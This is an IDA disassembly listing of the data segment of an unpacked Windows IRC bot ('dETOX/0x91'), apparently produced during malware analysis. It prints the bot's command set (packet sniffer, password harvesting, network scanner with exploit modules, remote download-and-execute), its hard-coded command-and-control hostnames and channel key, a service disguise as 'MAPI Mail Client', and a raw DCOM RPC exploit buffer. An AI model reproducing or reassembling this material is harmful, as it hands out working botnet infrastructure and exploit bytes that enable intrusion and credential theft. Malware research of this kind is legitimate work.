;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 90EE26F4513B2456FBBCDC0B9EF0BDD2
; File Name : u:\work\90ee26f4513b2456fbbcdc0b9ef0bdd2_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
MEW segment para public 'BSS' use32
assume cs:MEW
;org 401000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
dword_401000 dd 0 dword_401004 dd 0 dword_401008 dd 0 dword_40100C dd 0 ; sub_408A88+167�r
dword_401010 dd 0 ; sub_408A88+C8�r ...
dword_401014 dd 0 ; sub_408A88+12E�r ...
dword_401018 dd 0 ; sub_408A88+137�r ...
dword_40101C dd 0 ; sub_40899B+10�r ...
dword_401020 dd 0 ; sub_40899B+30�r ...
dword_401024 dd 0 ; sub_40899B+D9�r ...
dword_401028 dd 0 dword_40102C dd 0 dword_401030 dd 0 dword_401034 dd 0 dword_401038 dd 0 dword_40103C dd 0 ; sub_408C2B+3B�r ...
dd 0
dword_401044 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; MEW:0040C8BC�o
dword_401048 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_40104C dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_401050 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_401054 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_408EAB+85�r ...
dword_401058 dd 7C8217EAh ; resolved to->KERNEL32.SearchPathAdword_40105C dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_401060 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_409016+E7�r ...
dword_401064 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_409016+AF�r
dword_401068 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_40106C dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_401070 dd 7C8024A7h ; resolved to->KERNEL32.ReleaseMutexdword_401074 dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexAdword_401078 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_40107C dd 7C834D41h ; resolved to->KERNEL32.lstrcatAdword_401080 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_401084 dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorModedword_401088 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary ; MEW:0040A430�r
dword_40108C dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; MEW:00409FE8�r ...
dword_401090 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; MEW:00409FBE�r ...
dword_401094 dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequencydword_401098 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounterdword_40109C dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_4010A0 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4010A4 dd 7C80BE01h, 7C810111h, 7C830D74h; resolved to->KERNEL32.lstrcpyA ; MEW:0040A36D�r ...
dword_4010B0 dd 7C80C108h ; resolved to->KERNEL32.SetThreadPrioritydword_4010B4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_4010B8 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4010BC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_408E07+67�r ...
dword_4010C0 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4010C4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_4010C8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_408EAB+DE�r ...
dword_4010CC dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_409016+39�r ...
dword_4010D0 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40899B+A5�r ...
dword_4010D4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_40A45C+69�r
dword_4010D8 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_4010DC dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; sub_4098E2+58�r
dword_4010E0 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_4098E2+82�r
dword_4010E4 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_40A56C+5F�r
dword_4010E8 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_4098E2+3AD�r
dword_4010EC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; MEW:00405DB1�r ...
dword_4010F0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_405CEC+86�r ...
dword_4010F4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_404530+94B�r ...
dword_4010F8 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4010FC dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_404530+3FA�r ...
dd 0
dword_401104 dd 0 dword_401108 dd 0 dword_40110C dd 0 dword_401110 dd 0 dword_401114 dd 0 dword_401118 dd 0 dword_40111C dd 0 dword_401120 dd 0 dword_401124 dd 0 dword_401128 dd 0 dword_40112C dd 0 dword_401130 dd 0 dword_401134 dd 0 dword_401138 dd 0 dword_40113C dd 0 dword_401140 dd 0 dword_401144 dd 0 dword_401148 dd 0 dword_40114C dd 0 dword_401150 dd 0 dword_401154 dd 0 dword_401158 dd 0 dword_40115C dd 0 dword_401160 dd 0 dword_401164 dd 0 dword_401168 dd 0 dword_40116C dd 0 dword_401170 dd 0 dword_401174 dd 0 dword_401178 dd 0 dword_40117C dd 0 dword_401180 dd 0 dword_401184 dd 0 dword_401188 dd 0 dword_40118C dd 0 dword_401190 dd 0 dword_401194 dd 0 dword_401198 dd 0 dword_40119C dd 2 dup(0) dword_4011A4 dd 0 dword_4011A8 dd 0 dword_4011AC dd 0 dword_4011B0 dd 0 dword_4011B4 dd 0 dword_4011B8 dd 0 align 10h
dword_4011C0 dd 0 align 8
dword_4011C8 dd 0 align 10h
dword_4011D0 dd 0 ; sub_4098E2+389�r
dword_4011D4 dd 0 ; sub_4098E2+383�r
dword_4011D8 dd 0 dword_4011DC dd 0 ; MEW:0040A152�r ...
dword_4011E0 dd 0 ; sub_4098E2+1A7�r ...
align 8
dword_4011E8 dd 0 align 10h
dword_4011F0 dd 0 ; sub_407BC9+CA�r ...
dword_4011F4 dd 0 dword_4011F8 dd 0 ; sub_407F46+182�r
dword_4011FC dd 0 dword_401200 dd 0 ; sub_405DB7+376�r ...
dword_401204 dd 0 dword_401208 dd 0 ; sub_409570+60�r
dword_40120C dd 0 dword_401210 dd 0 dword_401214 dd 0 dword_401218 dd 0 dword_40121C dd 0 ; sub_4086A6+154�r ...
dword_401220 dd 0 ; sub_407BC9+FC�r ...
dword_401224 dd 0 dword_401228 dd 0 dword_40122C dd 0 dword_401230 dd 0 ; sub_405DB7+A1�r ...
dword_401234 dd 0 ; MEW:00406CB8�r ...
dword_401238 dd 0 ; sub_405DB7+BA�r ...
dword_40123C dd 0 ; sub_40549A+8E�r ...
dword_401240 dd 0 ; sub_407165+94�r ...
dword_401244 dd 0 ; sub_405DB7:loc_405E83�r ...
dword_401248 dd 0 ; sub_408EAB:loc_409007�r
dword_40124C dd 0 ; sub_4052A5+44�r ...
dword_401250 dd 0 ; sub_409570+2E�r
dword_401254 dd 0 dword_401258 dd 0 dword_40125C dd 0 dd 4 dup(0)
dword_401270 dd 25207325h, 2D3A2073h, 2343003h, 74756F72h, 3656E69h
; DATA XREF: sub_404530+C0D�o
dd 70202D02h, 203A6469h, 2333003h, 2036425h, 0A0Dh
dd 7268742Eh, 2E646165h, 6C6C696Bh, 0 ; DATA XREF: sub_404530:loc_4050FF�o
dword_4012A8 dd 7268742Eh, 2E646165h, 7473696Ch, 0unk_4012B8 db 25h ; % ; DATA XREF: sub_404530+BAB�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 72h ; r
db 6Fh, 75h, 74h
db 69h ; i
db 6Eh, 65h, 3
db 2
aPidNotFound db '- pid: not found!',0Dh,0Ah,0
align 4
a_thread_find db '.thread.find',0 ; DATA XREF: sub_404530:loc_4050A3�o
align 4
unk_4012F4 db 25h ; % ; DATA XREF: sub_404530:loc_405085�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 3
db 2
aSnifferUnloade db '- sniffer unloaded',0Dh,0Ah,0
align 10h
unk_401320 db 25h ; % ; DATA XREF: sub_404530+B4B�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 3
db 2
aSnifferNotActi db '- sniffer not activated',0Dh,0Ah,0
align 10h
a_sniffer_off db '.sniffer.off',0 ; DATA XREF: sub_404530:loc_405055�o
align 10h
unk_401360 db 25h ; % ; DATA XREF: sub_404530:loc_40504B�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 3
db 2
aSnifferAlready db '- sniffer already activated',0Dh,0Ah,0
align 4
unk_401394 db 25h ; % ; DATA XREF: sub_404530+AFA�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 3
db 2
aActivatedSniff db '- activated sniffer',0Dh,0Ah,0
align 10h
aSniffer db 'Sniffer',0 ; DATA XREF: sub_404530+AE5�o
; sub_404530+B36�o ...
a_sniffer_on db '.sniffer.on',0 ; DATA XREF: sub_404530:loc_405004�o
dword_4013D4 dd 25207325h, 2D3A2073h, 2343003h, 6C656873h, 646F636Ch
; DATA XREF: sub_404530+ACA�o
dd 2D020365h, 72756320h, 746E6572h, 6C20796Ch, 65747369h
dd 676E696Eh, 3A6E6F20h, 33300320h, 3A732502h, 2036425h
dd 74697720h, 30032068h, 64250234h, 73200203h, 73646E65h
dd 0A0Dh
a_shellcode_sta db '.shellcode.status',0 ; DATA XREF: sub_404530:loc_404FA2�o
align 4
dword_40143C dd 25207325h, 2D3A2073h, 2343003h, 75636573h, 2036572h
; DATA XREF: sub_404530+A65�o
dd 7973202Dh, 6D657473h, 64707520h, 64657461h, 61676120h
dd 74736E69h, 3003203Ah, 654E0233h, 45444474h, 202C0203h
dd 2333003h, 4D4F4344h, 202C0203h, 2333003h, 44626557h
dd 2037661h, 646E6120h
db 20h
db 3, 30h, 33h ; DATA XREF: MEW:off_4027B8�o
db 2
db 4Eh, 65h, 74h
db 42h ; B
db 69h, 6Fh, 73h
db 3
db 2, 20h, 76h
aUlnerabilities db 'ulnerabilities',0Dh,0Ah,0
align 4
a_secure_instal db '.secure.install',0 ; DATA XREF: sub_404530:loc_404F7A�o
dword_4014C8 dd 33300320h, 746F5402h, 2036C61h, 3003203Ah, 64250234h
; DATA XREF: sub_404530+A17�o
dd 203h
dword_4014E0 dd 33300320h, 3642502h, 25202E02h, 73hdword_4014F0 dd 3430032Dh, 70786502h, 74696F6Ch, 2036465h, 2Dh
; DATA XREF: sub_404530+9A7�o
dword_401504 dd 6163732Eh, 74732E6Eh, 737461hdword_401510 dd 25207325h, 2D3A2073h, 2343003h, 6E616373h, 372656Eh
; DATA XREF: sub_404530+971�o
dd 69202D02h, 6365666Eh, 676E6974h, 646E6520h, 6F206465h
dd 3003206Eh, 73250233h, 0A0D0203h, 0
dword_401548 dd 6163732Eh, 74732E6Eh, 706Fhdword_401554 dd 25207325h, 2D3A2073h, 2343003h, 6E616373h, 372656Eh
; DATA XREF: sub_404530:loc_404E2C�o
dd 3202D02h, 25023330h, 20020373h, 64207369h, 62617369h
dd 0D64656Ch, 0Ah
unk_401584 db 25h ; % ; DATA XREF: sub_404530+8F2�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 72h, 3
db 2
db 2Dh, 20h, 3
db 30h ; 0
db 33h, 2, 25h
db 73h ; s
db 3, 2, 20h
aIsAlreadyDisab db 'is already disabled',0Dh,0Ah,0
align 4
a_scan_disable db '.scan.disable',0 ; DATA XREF: sub_404530:loc_404DC3�o
align 4
dword_4015CC dd 25207325h, 2D3A2073h, 2343003h, 6E616373h, 676E6520h
; DATA XREF: sub_404530+889�o
dd 3656E69h, 63202D02h, 65727275h, 796C746Eh, 61637320h
dd 6E696E6Eh, 30032067h, 73250233h, 0A0D0203h, 0
dword_401608 dd 6163732Eh, 75632E6Eh, 6E657272h, 74hunk_401618 db 25h ; % ; DATA XREF: sub_404530+849�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 72h, 3
db 2
db 2Dh, 20h, 3
db 30h ; 0
db 33h, 2, 25h
db 73h ; s
db 3, 2, 20h
aIsNotAssignedA db 'is not assigned as exploit',0Dh,0Ah,0
align 4
dword_401658 dd 25207325h, 2D3A2073h, 2343003h, 6E616373h, 372656Eh
; DATA XREF: sub_404530:loc_404D56�o
dd 3202D02h, 25023330h, 20020373h, 65207369h, 6C62616Eh
dd 0A0D6465h, 0
unk_401688 db 25h ; % ; DATA XREF: sub_404530+81C�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 72h, 3
db 2
db 2Dh, 20h, 3
db 30h ; 0
db 33h, 2, 25h
db 73h ; s
db 3, 2, 20h
aIsAlreadyEnabl db 'is already enabled',0Dh,0Ah,0
align 10h
a_scan_enable db '.scan.enable',0 ; DATA XREF: sub_404530:loc_404CED�o
align 10h
asc_4016D0 db '-l',0 ; DATA XREF: sub_404530+788�o
align 4
aR db '-r',0 ; DATA XREF: sub_404530+6F7�o
align 4
asc_4016D8 db '-x',0 ; DATA XREF: sub_404530:loc_404BE9�o
; sub_404530:loc_404C47�o
align 4
aSD_D db '%s%d.%d',0 ; DATA XREF: sub_404530+6A8�o
a_: ; DATA XREF: sub_404530+681�o
; sub_4095E2+33�o
unicode 0, <.>,0
aS_0 db '-s',0 ; DATA XREF: sub_404530:loc_404B71�o
align 4
db 25h ; % ; DATA XREF: sub_404530+5E9�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 72h, 3
db 2
aFailedModuleCh db '- failed module chosen doesn',27h,'t excist',0Dh,0Ah,0
align 4
aScanner db 'Scanner',0 ; DATA XREF: sub_404530+590�o
; sub_404530:loc_404CD2�o ...
a_scan_start db '.scan.start',0 ; DATA XREF: sub_404530:loc_404A5F�o
dword_401740 dd 25207325h, 2D3A2073h, 2343003h, 6E65706Fh, 202D0203h
; DATA XREF: sub_404530:loc_404A55�o
dd 6C696166h, 74206465h, 706F206Fh, 3206E65h, 25023330h
dd 0D020373h, 0Ah
dword_401770 dd 25207325h, 2D3A2073h, 2343003h, 6E65706Fh, 202D0203h
; DATA XREF: sub_404530+51B�o
dd 6E65706Fh, 3206465h, 25023330h, 20020373h, 63637573h
dd 75667365h, 0D796C6Ch, 0Ah
aOpen db 'open',0 ; DATA XREF: sub_404530+505�o
align 4
a_open db '.open',0 ; DATA XREF: sub_404530:loc_404A11�o
align 4
unk_4017B4 db 25h ; % ; DATA XREF: sub_404530+4D7�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 3
db 2, 2Dh, 20h
aFailedToDownlo db 'failed to download [%s]',0Dh,0Ah,0
align 4
dword_4017E8 dd 25207325h, 2D3A2073h, 2343003h, 6E776F64h, 64616F6Ch
; DATA XREF: sub_404530+4C5�o
dd 202D0203h, 6E776F64h, 64616F6Ch, 61206465h, 6520646Eh
dd 75636578h, 20646574h, 5D73255Bh, 206F7420h, 5D73255Bh
dd 30032820h, 6C250233h, 20020375h, 6920626Bh, 3003206Eh
dd 64250233h, 73200203h, 5B206365h, 2333003h, 2036425h
dd 2F626B20h, 5D636573h, 0A0D29h
dword_401858 dd 25207325h, 2D3A2073h, 2343003h, 6E776F64h, 64616F6Ch
; DATA XREF: sub_404530+492�o
dd 202D0203h, 6E776F64h, 64616F6Ch, 5B206465h, 205D7325h
dd 5B206F74h, 205D7325h, 33300328h, 756C2502h, 6B200203h
dd 6E692062h, 33300320h, 3642502h, 65732002h, 35B2063h
dd 25023330h, 20020364h, 732F626Bh, 295D6365h, 0A0Dh
dword_4018BC dd 752Dh dd 652Dh ; DATA XREF: sub_404530+381�o
; sub_404530+5A3�o
dd 776F642Eh, 616F6C6Eh, 74682E64h, 7074h
; DATA XREF: sub_404530:loc_404878�o
dword_4018D4 dd 6372692Eh, 6D756A2Eh, 70hdword_4018E0 dd 25207325h, 2D3A2073h, 2343003h, 3637269h, 69202D02h
; DATA XREF: sub_404530+2EE�o
dd 726C6120h, 79646165h, 66656C20h, 30032074h, 73250233h
dd 0A0D0203h, 0
dword_401910 dd 54524150h, 20732520h, 0A0D7325h, 0 ; sub_404530+2FF�o
dd 6372692Eh, 7261702Eh, 74h ; DATA XREF: sub_404530:loc_4047B7�o
dword_40192C dd 25207325h, 2D3A2073h, 2343003h, 3637269h, 69202D02h
; DATA XREF: sub_404530+264�o
dd 61206D27h, 6165726Ch, 69207964h, 3003206Eh, 73250233h
dd 0A0D0203h, 0
dword_40195C dd 4E494F4Ah, 20732520h, 0A0D7325h, 0 ; sub_404530+275�o ...
dd 6372692Eh, 696F6A2Eh, 6Eh ; DATA XREF: sub_404530:loc_40472D�o
dword_401978 dd 6F2Dh aPasswordFinder db 'Password Finder',0 ; DATA XREF: sub_404530:loc_4046DF�o
; MEW:loc_40A436�o
a_harvest_passw db '.harvest.passwords',0 ; DATA XREF: sub_404530:loc_4046BA�o
align 10h
dword_4019A0 dd 25207325h, 2D3A2073h, 2343003h, 64707466h, 202D0203h
; DATA XREF: sub_404530+178�o
dd 72727563h, 6C746E65h, 696C2079h, 6E657473h, 20676E69h
dd 203A6E6Fh, 2333003h, 253A7325h, 20020364h, 68746977h
dd 34300320h, 3642502h, 65732002h, 0D73646Eh, 0Ah
dword_4019F0 dd 7074662Eh, 74732E64h, 73757461h, 0dword_401A00 dd 746F622Eh, 7379732Eh, 6F666E69h, 0dword_401A10 dd 25207325h, 2D3A2073h, 2343003h, 3746F62h, 6C202D02h
; DATA XREF: sub_404530+125�o
dd 6C61636Fh, 3A504920h, 33300320h, 3732502h, 0A0D02h
dword_401A38 dd 746F622Eh, 70692Ehdword_401A40 dd 746F622Eh, 736F2Ehdword_401A48 dd 25207325h, 253A2073h, 0A0D73h ; sub_40A5D5+5C�o
dword_401A54 dd 746F622Eh, 7470752Eh, 656D69haQuitGodHatesUs db 'QUIT :god hates us all',0Dh,0Ah,0 ; DATA XREF: sub_404530+AB�o
align 4
a_bot_leave db '.bot.leave',0 ; DATA XREF: sub_404530:loc_4045CA�o
align 4
unk_401A88 db 25h ; % ; DATA XREF: sub_404530+90�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 76h ; v
db 65h, 72h, 73h
db 69h ; i
db 6Fh, 6Eh, 3
db 2
aSADerangedProd db '- %s a deranged product by an evil coder',0Dh,0Ah,0
a_bot_compilati db '.bot.compilation',0 ; DATA XREF: sub_404530:loc_4045A5�o
align 4
asc_401ADC: ; DATA XREF: sub_404530+2E�o
; sub_4055A6+78�o
unicode 0, < >,0
aDetox0x91Win32 db 'dETOX/0x91 (win32)',0 ; DATA XREF: sub_404530+86�o
; sub_4052A5+CD�o ...
align 4
aMapi32_exe db 'mapi32.exe',0 ; DATA XREF: MEW:00406F4F�o
; sub_407708+81�o ...
align 10h
aMapi32_dll db 'mapi32.dll',0
align 4
aMapi db 'MAPI',0 ; DATA XREF: sub_405CEC:loc_405D1B�o
; sub_40899B+28�o ...
align 4
aMapiMailClient db 'MAPI Mail Client',0 ; DATA XREF: sub_408A88+57�o
align 4
aEnablesSupport db 'Enables support for the Messaging Application Program Interface.',0
; DATA XREF: sub_408A88+91�o
align 4
aMapiMailClie_0 db 'MAPI Mail Client',0
align 10h
aXmapimailclien db 'xMAPIMailClientx',0 ; DATA XREF: sub_408DE9�o sub_408EAB+D�o
align 8
off_401B98 dd offset a0x80_mySecure_ ; DATA XREF: sub_405167+17�r
; sub_4052A5+37�r
; "0x80.my-secure.name"
word_401B9C dw 199Ch ; DATA XREF: sub_4052A5+5B�r
align 10h
off_401BA0 dd offset byte_40B078 ; DATA XREF: sub_4052A5+9C�r
; sub_4052A5+B4�r
off_401BA4 dd offset a9 ; DATA XREF: sub_404530+224�r
; sub_404530+2AE�r ...
; "#9#"
off_401BA8 dd offset aG3t0u7 ; DATA XREF: sub_4055A6+1AF�r
; sub_4055A6+1F8�r ...
; "g3t0u7"
off_401BAC dd offset aRaw ; DATA XREF: sub_409834+97�r
; "#raw"
off_401BB0 dd offset aExploit ; DATA XREF: sub_407282+59�r
; sub_407282+23C�r ...
; "#exploit"
dd offset a0x80_my1x1_com ; "0x80.my1x1.com"
dd 199Ch, 40B078h, 401CDCh, 401CD4h, 401CCCh, 401CC0h
dd 401C98h, 199Ch, 40B078h, 401CDCh, 401CD4h, 401CCCh
dd 401CC0h, 401C80h, 199Ch, 40B078h, 401CDCh, 401CD4h
dd 401CCCh, 401CC0h, 401C64h, 199Ch, 40B078h, 401CDCh
dd 401CD4h, 401CCCh, 401CC0h, 401C50h, 199Ch, 40B078h
dd 401CDCh, 401CD4h, 401CCCh, 401CC0h
dd 646E696Dh, 6B61656Ch, 6D6F632Eh, 0 ; DATA XREF: sub_4055A6+567�o
a0xff_memzero_i db '0xff.memzero.info',0
align 4
a0x80_onlineSof db '0x80.online-software.org',0
align 10h
a0x80_goingform db '0x80.goingformars.com',0
align 4
a0x80_martianso db '0x80.martiansong.com',0
align 10h
a0x80_my1x1_com db '0x80.my1x1.com',0 ; DATA XREF: MEW:00401BB4�o
align 10h
aExploit db '#exploit',0 ; DATA XREF: MEW:off_401BB0�o
align 4
aRaw db '#raw',0 ; DATA XREF: MEW:off_401BAC�o
align 4
aG3t0u7 db 'g3t0u7',0 ; DATA XREF: MEW:off_401BA8�o
align 4
a9 db '#9#',0 ; DATA XREF: MEW:off_401BA4�o
a0x80_mySecure_ db '0x80.my-secure.name',0 ; DATA XREF: MEW:off_401B98�o
aUserSSSSNickS db 'USER %s %s %s :%s',0Dh,0Ah ; DATA XREF: sub_4052A5+D5�o
; sub_4055A6+33B�o
db 'NICK %s',0Dh,0Ah,0
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_4052A5+BA�o
align 10h
asc_401D20: ; DATA XREF: sub_4055A6+5DE�o
unicode 0, <*>,0
asc_401D24: ; DATA XREF: sub_4055A6+52F�o
unicode 0, <:>,0
a@: ; DATA XREF: sub_4055A6+4C1�o
; sub_4055A6:loc_405C52�o
unicode 0, <@>,0
asc_401D2C: ; DATA XREF: sub_4055A6+488�o
unicode 0, <!>,0
aSS_0 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_4055A6+431�o
a513 db '513',0 ; DATA XREF: sub_4055A6+3FC�o
a480 db '480',0 ; DATA XREF: sub_4055A6+3E7�o
a475 db '475',0 ; DATA XREF: sub_4055A6+3D2�o
a474 db '474',0 ; DATA XREF: sub_4055A6+3BD�o
a473 db '473',0 ; DATA XREF: sub_4055A6+3A8�o
a471 db '471',0 ; DATA XREF: sub_4055A6:loc_405939�o
a432 db '432',0 ; DATA XREF: sub_4055A6:loc_4058F3�o
a433 db '433',0 ; DATA XREF: sub_4055A6:loc_4058B0�o
asc_401D58 db ' :',0 ; DATA XREF: sub_4055A6+2AC�o
align 4
a332 db '332',0 ; DATA XREF: sub_4055A6:loc_405841�o
a366 db '366',0 ; DATA XREF: sub_4055A6+264�o
a422 db '422',0 ; DATA XREF: sub_4055A6+24F�o
a001 db '001',0 ; DATA XREF: sub_4055A6:loc_4057E0�o
aModeSI db 'MODE %s +i',0Dh,0Ah,0 ; DATA XREF: sub_4055A6+1E4�o
; sub_4055A6+65E�o
align 4
a009 db '009',0 ; DATA XREF: sub_4055A6:loc_405768�o
aKick db 'KICK',0 ; DATA XREF: sub_4055A6:loc_40572A�o
align 4
aError db 'ERROR',0 ; DATA XREF: sub_4055A6:loc_4056F5�o
align 10h
dword_401D90 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_4055A6+13D�o
dd 0D017325h, 0Ah
dword_401DAC dd 4556013Ah, 4F495352h, 14Eh dd 4556013Ah, 4F495352h, 4Eh ; DATA XREF: sub_4055A6+105�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_4055A6:loc_405694�o
; sub_4055A6+2EF�o
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_4055A6+DD�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_4055A6:loc_405667�o
align 10h
dword_401DE0 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx: ; DATA XREF: sub_405DB7+15B�o
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
align 10h
dword_401E60 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_405DB7+133�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_4021C4 dd 20h, 0 dd 20h, 5C005Ch, 0
aC1234561111111: ; DATA XREF: sub_405DB7+19A�o
unicode 0, <\C$\123456111111111111111.doc>,0
align 8
